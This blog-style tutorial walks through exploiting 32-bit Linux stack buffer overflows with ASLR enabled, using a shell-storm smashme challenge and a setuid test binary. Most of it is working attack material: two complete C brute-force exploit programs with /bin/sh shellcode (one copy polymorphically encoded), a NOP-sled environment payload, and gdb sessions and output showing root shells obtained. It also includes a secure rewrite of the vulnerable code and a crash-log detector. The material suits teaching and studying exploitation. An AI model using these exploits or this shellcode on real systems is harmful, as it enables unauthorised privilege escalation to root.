easy pwn on smashme13
Here are my tools in action…
The challenge is to smash this program with ASLR enabled…
And gain root access…
You can find the original source here: http://www.shell-storm.org/smashme/files/smashme-13.php
/* Compiled on x86 64 bits*/
#include <stdio.h>
#include <string.h>

int smash(char*);

int main(int argc, char** argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: smashme <string>\n");
        exit(1);
    }
    smash(argv[1]);
    return 0;
}

int smash(char* egg)
{
    char buff[128];
    strcat(buff, egg);
    return 0;
}
Action…
gunslinger@c0debreaker:~/bof$ vim smashme13.c
gunslinger@c0debreaker:~/bof$ gcc -o smashme13 -fno-stack-protector -mpreferred-stack-boundary=2 -g smashme13.c
smashme13.c: In function ‘main’:
smashme13.c:12: warning: incompatible implicit declaration of built-in function ‘exit’
gunslinger@c0debreaker:~/bof$
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/smashme13 -s 1 -e 600

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 128 byte(s)
[!] Application got segmentation fault by giving 128 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 132
[*] Using return address 0xbf8f9fe4
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
^C
gunslinger@c0debreaker:~/bof$ ./smashme13
usage: smashme <string>
gunslinger@c0debreaker:~/bof$ ./smashme13 a
gunslinger@c0debreaker:~/bof$ ./smashme13 `perl -e 'print "A" x 128'`
Segmentation fault
gunslinger@c0debreaker:~/bof$ gdb smashme13
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) r `perl -e 'print "A" x 132'`
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 132'`

Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
Current language: auto; currently asm
(gdb) r `perl -e 'print "A" x 128'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 128'`

Program received signal SIGSEGV, Segmentation fault.
0xbfe138a4 in ?? ()
(gdb) r `perl -e 'print "A" x 150'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 150'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 148'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 148'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 144'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 144'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 142'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 142'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 140'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 120'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 120'`

Program exited normally.
(gdb) r `perl -e 'print "A" x 135'`
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 135'`

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) r `perl -e 'print "A" x 136'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 136'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) disas main
Dump of assembler code for function main:
0x08048454 <main+0>:    push   %ebp
0x08048455 <main+1>:    mov    %esp,%ebp
0x08048457 <main+3>:    sub    $0x10,%esp
0x0804845a <main+6>:    cmpl   $0x1,0x8(%ebp)
0x0804845e <main+10>:   jg     0x8048491 <main+61>
0x08048460 <main+12>:   mov    0x804a01c,%eax
0x08048465 <main+17>:   mov    %eax,0xc(%esp)
0x08048469 <main+21>:   movl   $0x18,0x8(%esp)
0x08048471 <main+29>:   movl   $0x1,0x4(%esp)
0x08048479 <main+37>:   movl   $0x8048590,(%esp)
0x08048480 <main+44>:   call   0x8048368 <fwrite@plt>
0x08048485 <main+49>:   movl   $0x1,(%esp)
0x0804848c <main+56>:   call   0x8048388 <exit@plt>
0x08048491 <main+61>:   mov    0xc(%ebp),%eax
0x08048494 <main+64>:   add    $0x4,%eax
0x08048497 <main+67>:   mov    (%eax),%eax
0x08048499 <main+69>:   mov    %eax,(%esp)
0x0804849c <main+72>:   call   0x80484a8 <smash>
0x080484a1 <main+77>:   mov    $0x0,%eax
0x080484a6 <main+82>:   leave
0x080484a7 <main+83>:   ret
End of assembler dump.
(gdb) q
The program is running.  Exit anyway? (y or n) y
gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 136
[*] Using return address 0xbfab19a4
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# id
uid=1000(gunslinger) gid=1000(gunslinger) euid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$
stackbf2.c
This is a newer version of stackbf.
For the return address I use
static inline getesp()
{
    __asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}
because it is accurate enough, so that is what I use.
/*
 * stack brute forcer by Gunslinger_ yudha.gunslinger@gmail.com
 * This is version 2 of stackbf.c
 * The difference is that we no longer supply our own return address: a piece
 * of inline asm copies the %esp register into %eax, and that value is
 * accurate enough to use as the return address, so that is what we use.
 *
 * # original assembly of the shellcode; the bytes below are the same code
 * # encoded as polymorphic shellcode to hide characters such as "\xcd\x80"
 * # ("int $0x80" in assembly)
 * .global _start
 * _start:
 *
 *     xor %eax, %eax
 *     xor %ebx, %ebx
 *     xor %ecx, %ecx
 *     xor %edx, %edx
 *
 *     mov $0xb, %al
 *     push %ebx
 *     push $0x68732f2f
 *     push $0x6e69622f
 *     mov %esp, %ebx
 *     xor %edx, %edx
 *     xor %edx, %edx
 *     push %ebx
 *     int $0x80
 *
 *     inc %eax
 *     int $0x80
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define NOP 0x90
/* Length of environment variable ~ 128 Kb */
#define ENV_LEN 128000

/* Read the current stack pointer (32-bit x86 only): this is our return
 * address guess, no more debugging sessions to find it ;) */
static inline unsigned int getesp(void)
{
    unsigned int esp;
    __asm__("movl %%esp, %0" : "=r"(esp));
    return esp;
}

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x35\x80\xe9\x01" /* Polymorphic shell */
                   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\xfe"
                   "\x66\x07\xe5\x40\x88\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3"
                   "\xbe\x18\x66\x07\x66\xfe\x88\x02\xb5\x75\x02\xb5";

int main(int argc, char **argv)
{
    char *application = NULL;
    char *buffer = NULL;
    char env_var[ENV_LEN];
    char *env[2] = { env_var, NULL };
    unsigned int *p;
    int num, ret, pid, payload_size;

    if (argc < 3) {
        printf("\nStack Brute Force");
        printf("\nProgrammer : Gunslinger_");
        printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
        exit(1);
    }
    printf("[*] Using return address 0x%x \n", getesp());
    printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
    printf("[*] Shellcode size %zu bytes\n", strlen(shellcode));

    application = strdup(argv[1]);
    payload_size = atoi(argv[2]);
    /* room for the payload plus the terminating zero word written after the loop */
    buffer = malloc(payload_size + 2 * sizeof(unsigned int));

    /* environment variable: NOP sled with the shellcode at the very end */
    memset(env_var, NOP, ENV_LEN);
    memcpy(env_var + ENV_LEN - strlen(shellcode) - 1, shellcode, strlen(shellcode));
    env_var[ENV_LEN - 1] = 0;

    /* payload: the guessed return address repeated over the whole buffer */
    p = (unsigned int *) buffer;
    for (num = 0; num < payload_size; num += sizeof(unsigned int), p++)
        *p = getesp();
    *p = 0;

    /* launch the target again and again until a child exits with status 0 */
    do {
        switch (pid = fork()) {
        case 0:
            execle(application, application, buffer, NULL, env);
            exit(0);
            break;
        default:
            waitpid(pid, &ret, 0);
            break;
        }
    } while (ret);
    return 0;
}
and this is the program in action
gunslinger@codebreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbf941d04
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbfeb4a74
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbfdabfc4
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408
[*] Using return address 0xbfbdc7a4
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# exit
gunslinger@codebreaker:~/bof$
stackbf.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/*
 * You can use a debugger to get the esp address; that makes the program win much faster!
 * RET is the return address we use to overwrite EIP. We can use 0xbffffff4 by default, but it may take some time...
 */
#define RET 0xbffffff4 // you may change this
#define NOP 0x90
// Length of environment variable ~ 128 Kb
#define ENV_LEN 128000

char shellcode[] =
/*
; standard /bin//sh
global _start
_start:
    xor eax,eax
    push byte 11
    pop eax
    push ebx
    push 0x68732f2f
    push 0x6e69622f
    mov ebx,esp
    xor ecx,ecx
    xor edx,edx
    push ebx
    int 0x80
*/
"\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

int main(int argc, char **argv)
{
    char *application = NULL;
    char *buffer = NULL;
    char env_var[ENV_LEN];
    char *env[2] = { env_var, NULL };
    unsigned int *p;
    int num, ret, pid, payload_size;

    if (argc < 3) {
        printf("\nStack Brute Force");
        printf("\nProgrammer : Gunslinger_");
        printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
        exit(1);
    }
    printf("[*] Using return address 0x%x \n", RET);
    printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
    printf("[*] Shellcode size %zu bytes\n", strlen(shellcode));

    application = strdup(argv[1]);
    payload_size = atoi(argv[2]);
    /* room for the payload plus the terminating zero word written after the loop */
    buffer = malloc(payload_size + 2 * sizeof(unsigned int));

    /* environment variable: NOP sled with the shellcode at the very end */
    memset(env_var, NOP, ENV_LEN);
    memcpy(env_var + ENV_LEN - strlen(shellcode) - 1, shellcode, strlen(shellcode));
    env_var[ENV_LEN - 1] = 0;

    /* payload: RET repeated over the whole buffer */
    p = (unsigned int *) buffer;
    for (num = 0; num < payload_size; num += sizeof(unsigned int), p++)
        *p = RET;
    *p = 0;

    /* launch the target again and again until a child exits with status 0 */
    do {
        switch (pid = fork()) {
        case 0:
            execle(application, application, buffer, NULL, env);
            exit(0);
            break;
        default:
            waitpid(pid, &ret, 0);
            break;
        }
    } while (ret);
    return 0;
}
Linux Buffer Overflow Tutorial III
Linux Buffer Overflow Tutorial
Edition : Third
Author : gunslinger_
Web : http://gunslingerc0de.wordpress.com
Date : Sat Jul 24 20:01:54 WIT 2010
Contents :
0x01. Introduction
0x02. Scenario
0x03. Conclusion
0x04. Special thanks
0x05. Stuff
0x01. Introduction
~~~~~~~~~~~~~~~~~
Earlier I wrote buffer overflow articles using two different techniques.
In those articles, however, we did not have stack randomisation (ASLR) enabled, and we could locate memory easily.
In this article I will explain a buffer overflow technique that works with stack randomisation (ASLR) enabled.
ASLR stands for Address Space Layout Randomization.
In other words, we will exploit a buffer overflow in an application whose return address is dynamic.
So exploiting it by pinning the return address to the memory location seen at one moment is useless,
because at a different moment we will get a different (dynamic) address.
However, ASLR is not that strong on 32-bit machines.
In fact, some Linux kernels are compiled with 23 bits for placing the relative address
of the stack within the address space where it can be allocated.
" 2 ^ 23 == 8388608 or 8 MB "
That means the base stack address lands at a location that cannot be predicted (random),
but that randomness only covers a range of 8388608 bytes, or 8 MB, of memory.
If we call the vulnerable program with a very long environment variable,
say 128 KB, where most of that environment variable is filled with NOP ~ No OPeration (0x90) or junk "A" (0x41),
and at the end of that environment variable we place our shellcode,
what happens? Sooner or later, after a number of launches,
one of them will land us on the address we want.
The No OPeration (NOP) or junk "A" sled lets execution slide along one byte at a time until the shellcode runs.
This technique is almost the same as the one in my second buffer overflow article;
you can see it at http://www.exploit-db.com/papers/14108/ .
And we launch it through exec*e (execve or execle), passing the environment into the vulnerable application's process.
Example: our environment variable contains NOP or junk + shellcode with a length of 128 KB.
Let's compute what percentage of the address space our payload occupies.
" 128000 / 8000000 x 100% = 1.525878906% or 1.6% "
This calculation shows that our 128 KB payload
covers 1.525878906% (percent), or 1.6%, of the whole address space (100% ~ 8388608 bytes or 8 MB).
So we have a 1.6% chance on each try of landing next to the vulnerable buffer.
Of course we will write a program that does the exploitation automatically,
because surely we want to test them one by one by hand ~ That was a very bad joke, wasn't it? ;)
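A check of the figures above, added here and not part of the original tutorial, writing $R$ for the randomisation range and $L$ for the payload length:

$$R = 2^{23} = 8388608 \text{ bytes}, \qquad L = 128000 \text{ bytes}$$

$$p = \frac{L}{R} = \frac{128000}{8388608} \approx 0.01526 \approx 1.53\%$$

The tutorial's shorthand $128000 / 8000000 = 1.6\%$ rounds 8 MB to $8\,000\,000$. Treating each launch as an independent uniform draw from the $R$-byte range, the expected number of launches until the guessed address falls inside the 128 KB sled is

$$\frac{1}{p} = \frac{8388608}{128000} \approx 65.5,$$

so against a payload of this size the 8 MB range is worth only $\log_2(1/p) \approx 6$ bits of effective entropy, which is why the conclusion below holds for 32-bit machines.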
0x02. Scenario
~~~~~~~~~~~~~~
In the scenario for this tutorial we have a case where an application is vulnerable to a buffer overflow.
But since we are only a regular (non-root) user, we obviously cannot switch ASLR off to exploit that application.
Let's just build the scenario.
gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ vim bof.c
gunslinger@c0debreaker:~/bof$ cat bof.c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
    char buffer[400];
    strcpy(buffer, argv[1]);
    return 0;
}
gunslinger@c0debreaker:~/bof$ gcc -o bof -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
gunslinger@c0debreaker:~/bof$ sudo chown root:root bof
[sudo] password for gunslinger:
gunslinger@c0debreaker:~/bof$ sudo chmod 4755 bof
gunslinger@c0debreaker:~/bof$
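The fix for both vulnerable listings on this page (the unbounded strcat() into an uninitialised buff[128] in smashme-13's smash(), and the unbounded strcpy() into buffer[400] in bof.c above), as an added example that is not part of the original posts; smash_safe(), copy_bounded() and MAX_EGG are names chosen here:

```c
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE 128                 /* same size as smashme-13's buff[128] */
#define MAX_EGG   (BUFF_SIZE - 1)     /* longest string that fits with its NUL */

/* Hardened version of smash(): the buffer starts as a definite empty string
 * (the original never initialised it, so strcat() appended after whatever
 * bytes happened to be on the stack) and input that would not fit is
 * rejected before any copy happens. Returns 0 when egg was stored, -1 when
 * it was refused. The 128-byte argument that crashes the original is refused
 * here, since 128 characters plus the terminator need 129 bytes. */
int smash_safe(const char *egg)
{
    char buff[BUFF_SIZE] = "";                      /* definite, empty C string */
    size_t room = sizeof(buff) - strlen(buff) - 1;  /* bytes still free for data */

    if (egg == NULL || strlen(egg) > room)
        return -1;                                  /* would overflow: refuse */

    strncat(buff, egg, room);                       /* bounded append */
    return 0;
}

/* The same idea for bof.c's strcpy(buffer, argv[1]): copy with an explicit
 * bound and a guaranteed terminator. Returns the number of bytes stored, or
 * -1 when the input is longer than the destination can hold. */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (dst_len == 0 || n >= dst_len)
        return -1;
    memcpy(dst, src, n + 1);                        /* n + 1 includes the NUL */
    return (int) n;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: smashme <string>\n");
        return 1;
    }
    if (smash_safe(argv[1]) != 0) {
        fprintf(stderr, "input longer than %d bytes refused\n", MAX_EGG);
        return 2;
    }
    return 0;
}
```

With this version the 128 x "A" argument from the sessions above produces a refusal and exit code 2 instead of a segmentation fault.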
The scenario is set up.
Now we have to find how many bytes are needed to overwrite eip.
We don't need to search by hand for the number of bytes
that make the vulnerable program crash, as in the previous article,
because we can use an application I wrote.
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
Usage: ./bufferbruteforce.py [options]
Options: -a, --application <path-to-application> | Target application for bruteforcing buffer
-s, --start <int> | start byte for bruteforcing buffer
-e, --end <int> | end byte for bruteforcing buffer
-h, --help <help> | print this help
Example: ./bufferbruteforce.py -a /home/gunslinger/bufferoverflow/bof -s 1 -e 500
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/bof -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!
gunslinger@c0debreaker:~/bof$
OK, we found that 404 bytes are needed to make the vulnerable program crash.
Now let's find how many bytes are needed to get the eip register overwritten.
gunslinger@c0debreaker:~/bof$ gdb bof
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) r `perl -e 'print "A" x 406'`
Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 406'`

Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) r `perl -e 'print "A" x 407'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 407'`

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) r `perl -e 'print "A" x 408'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 408'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141       0x41414141
(gdb)
eip is completely overwritten with the letter "A".
So our payload will be 408 bytes as well.
Now we debug to get an estimate of the esp register (stack pointer) and pick one of the values,
because that register will not land on a static address.
First we disassemble to find where the strcpy call is.
(gdb) disas main
Dump of assembler code for function main:
0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    sub    $0x198,%esp
0x080483cd <main+9>:    mov    0xc(%ebp),%eax
0x080483d0 <main+12>:   add    $0x4,%eax
0x080483d3 <main+15>:   mov    (%eax),%eax
0x080483d5 <main+17>:   mov    %eax,0x4(%esp)
0x080483d9 <main+21>:   lea    -0x190(%ebp),%eax
0x080483df <main+27>:   mov    %eax,(%esp)
0x080483e2 <main+30>:   call   0x80482f8 <strcpy@plt>
0x080483e7 <main+35>:   mov    $0x0,%eax
0x080483ec <main+40>:   leave
0x080483ed <main+41>:   ret
End of assembler dump.
(gdb) b *main+30
Breakpoint 1 at 0x80483e2
(gdb)
There it is: the strcpy call sits at 0x80483e2
0x080483e2 : call 0x80482f8
Now we find where the esp register is likely to land in this application.
(gdb) r hey where is esp ?
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof hey where is esp ?

Breakpoint 1, 0x080483e2 in main ()
(gdb) i r esp
esp            0xbfeba1f0       0xbfeba1f0
(gdb) r hey where is esp ?
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof hey where is esp ?

Breakpoint 1, 0x080483e2 in main ()
(gdb) i r esp
esp            0xbf98dcc0       0xbf98dcc0
(gdb) r hey where is esp ?
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/bof hey where is esp ?

Breakpoint 1, 0x080483e2 in main ()
(gdb) i r esp
esp            0xbfcc8800       0xbfcc8800
(gdb)
See? The esp register lands on an address that is not static.
On the first run the esp register was at -> 0xbfeba1f0
esp 0xbfeba1f0 0xbfeba1f0
On the second run the esp register was at -> 0xbf98dcc0
esp 0xbf98dcc0 0xbf98dcc0
On the third run the esp register was at -> 0xbfcc8800
esp 0xbfcc8800 0xbfcc8800
That is ASLR making the address land dynamically.
OK, now we just pick one of those three addresses; for this tutorial's scenario
we take the first esp value, 0xbfeba1f0,
and run the exploit program with RET (return address) 0xbfeba1f0.
gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ vim stackbf.c
gunslinger@c0debreaker:~/bof$ gcc -o stackbf stackbf.c
gunslinger@c0debreaker:~/bof$ ./stackbf

Stack Brute Force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
Usage: ./stackbf <application> <payload_size>

gunslinger@c0debreaker:~/bof$ ./stackbf bof 408
[*] Using return address 0xbfeba1f0
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAME OVER
GAME OVER
# exit
gunslinger@c0debreaker:~/bof$
The attack vector went through smoothly.
But does it still work if the return address is changed to a lower address?
Let's try RET (return address) 0xbffffff4
gunslinger@c0debreaker:~/bof$ vim stackbf.c
gunslinger@c0debreaker:~/bof$ gcc -o stackbf stackbf.c
gunslinger@c0debreaker:~/bof$ ./stackbf bof 408
[*] Using return address 0xbffffff4
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
(...after some second...)
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAME OVER
GAME OVER
# exit
gunslinger@c0debreaker:~/bof$
It worked; it just took a few seconds to spawn the shell.
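Each failed launch of the brute forcer above leaves a "segfault at ... ip ... sp ..." line in the kernel log, and that burst is what a defender can alert on. The parser and heuristic below are an added example, not part of the original tutorial; the log lines are constructed (addresses taken from the gdb sessions above), and parse_segfault(), is_smash_candidate() and count_smash_candidates() are names chosen here:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One parsed x86 kernel message of the form
 *   "<comm>[<pid>]: segfault at <addr> ip <ip> sp <sp> error <code>"
 * (hex fields as the kernel prints them, without a 0x prefix). */
struct segfault_event {
    char comm[32];
    int pid;
    unsigned long addr, ip, sp, err;
};

/* Stack region of a 32-bit Linux process with the 3 GB split, which is
 * where every esp value on this page (0xbfeba1f0, 0xbf98dcc0, ...) lies. */
#define STACK_LO 0xbf000000UL
#define STACK_HI 0xc0000000UL

/* Parse one dmesg or syslog line. Returns 1 when it is a segfault record
 * (and fills *ev), 0 for anything else. */
int parse_segfault(const char *line, struct segfault_event *ev)
{
    const char *p = strstr(line, "kernel: ");   /* syslog-style prefix */
    p = p ? p + 8 : line;
    if (*p == '[') {                             /* dmesg "[ sec.usec] " stamp */
        const char *q = strstr(p, "] ");
        if (q == NULL)
            return 0;
        p = q + 2;
    }
    int n = sscanf(p, "%31[^[][%d]: segfault at %lx ip %lx sp %lx error %lx",
                   ev->comm, &ev->pid, &ev->addr, &ev->ip, &ev->sp, &ev->err);
    return n == 6;
}

/* A crash looks like a return-address overwrite when the instruction
 * pointer itself is the faulting address (the CPU tried to fetch code from
 * the overwritten return slot: 0x41414141 in the gdb session above, or an
 * unmapped stack guess from the brute forcer) or when ip points into the
 * stack at all, which a normal program never does. */
int is_smash_candidate(const struct segfault_event *ev)
{
    return ev->ip == ev->addr || (ev->ip >= STACK_LO && ev->ip < STACK_HI);
}

/* Count candidate crashes of one program in a batch of log lines. The
 * brute forcer produces these in a burst (one per failed launch), so a
 * count above a small threshold for a setuid binary is the alert. */
int count_smash_candidates(const char *const *lines, int nlines, const char *comm)
{
    int hits = 0;
    for (int i = 0; i < nlines; i++) {
        struct segfault_event ev;
        if (parse_segfault(lines[i], &ev) && strcmp(ev.comm, comm) == 0 &&
            is_smash_candidate(&ev))
            hits++;
    }
    return hits;
}

/* Constructed sample in the format the page's Ubuntu box (2.6.28, i686)
 * writes; not a real capture. */
static const char *const SAMPLE_LOG[] = {
    /* brute forcer guesses that were not mapped: ip == faulting address, in the stack */
    "[ 1201.433521] bof[4011]: segfault at bfeba1f0 ip bfeba1f0 sp bfc31a04 error 4",
    "[ 1201.441002] bof[4012]: segfault at bf98dcc0 ip bf98dcc0 sp bfa7e3f4 error 4",
    /* the 408 x 'A' run from the gdb session: return address is the fill byte */
    "[ 1202.100330] bof[4013]: segfault at 41414141 ip 41414141 sp bfcc8804 error 4",
    /* unrelated null-pointer crash in another program: not a candidate */
    "[ 1203.775910] firefox[2231]: segfault at 0 ip 0806b2c1 sp bfa0c3e0 error 4",
    /* bof run without an argument, faulting inside libc: not a candidate either */
    "[ 1204.002000] bof[4014]: segfault at 0 ip b7e9c5a3 sp bfd1a0f0 error 4",
    /* non-segfault kernel line */
    "[ 1204.900000] usb 1-1: new high speed USB device using ehci_hcd and address 3",
};
#define SAMPLE_LOG_LEN ((int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]))

int main(void)
{
    int hits = count_smash_candidates(SAMPLE_LOG, SAMPLE_LOG_LEN, "bof");
    printf("bof: %d of %d log lines look like stack smashing attempts\n",
           hits, SAMPLE_LOG_LEN);
    return hits >= 3 ? 1 : 0;     /* non-zero exit when the burst threshold is reached */
}
```

On a live system the same functions can be fed the output of dmesg or the kernel facility of syslog; the 3 GB split constants only apply to 32-bit processes like the ones in this tutorial.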
0x03. Conclusion
~~~~~~~~~~~~~~~~
From this experiment we conclude that ASLR is not that strong on 32-bit machines.
0x04. Special thanks
~~~~~~~~~~~~~~~~~~~~
Thanks to : devilzc0de crew and jasakom crew
: www.devilzc0de.org / www.devilzc0de.com – www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
: serverisdown.org, xc0de.or.id, echo.or.id, hacker-newbie.org, tecon-crew.org
: Scut, jonathan salwan, mywisdom, r0073r, d3hydr8 (we miss you bro), ty myler
: And all exploit database…
0x05. Stuff
~~~~~~~~~~~
——————————————stackbf.c——————————————
(identical to the stackbf.c listing given above on this page)
————————————————-EOF—————————————————
——————————————bufferbruteforce.py——————————————
#!/usr/bin/python
import sys, commands, re, os, os.path
'''
This is a buffer brute forcer: it feeds the target growing inputs and reports how many bytes it takes to get a Segmentation fault.
Written for educational purpose and pentest only. Use it at your own risk.
Toolname : bufferbruteforce.py
Author   : gunslinger_ <yudha.gunslinger@gmail.com>
date     : Sun Jul 4 00:58:54 WIT 2010
You can use this simple bof.c for testing.
-----------------bof.c-----------------
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
    char buffer[400];
    strcpy(buffer, argv[1]);
    return 0;
}
------------------EOF------------------
Example usage :
root@c0debreaker:/home/gunslinger/bof# cat bof.c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
    char buffer[400];
    strcpy(buffer, argv[1]);
    return 0;
}
root@c0debreaker:/home/gunslinger/bof# echo 0 > /proc/sys/kernel/randomize_va_space
root@c0debreaker:/home/gunslinger/bof# gcc -o bof -g -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
root@c0debreaker:/home/gunslinger/bof# exit
gunslinger@c0debreaker:~/bof$ ./bbf.py -a /home/gunslinger/bof/bof -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$
'''

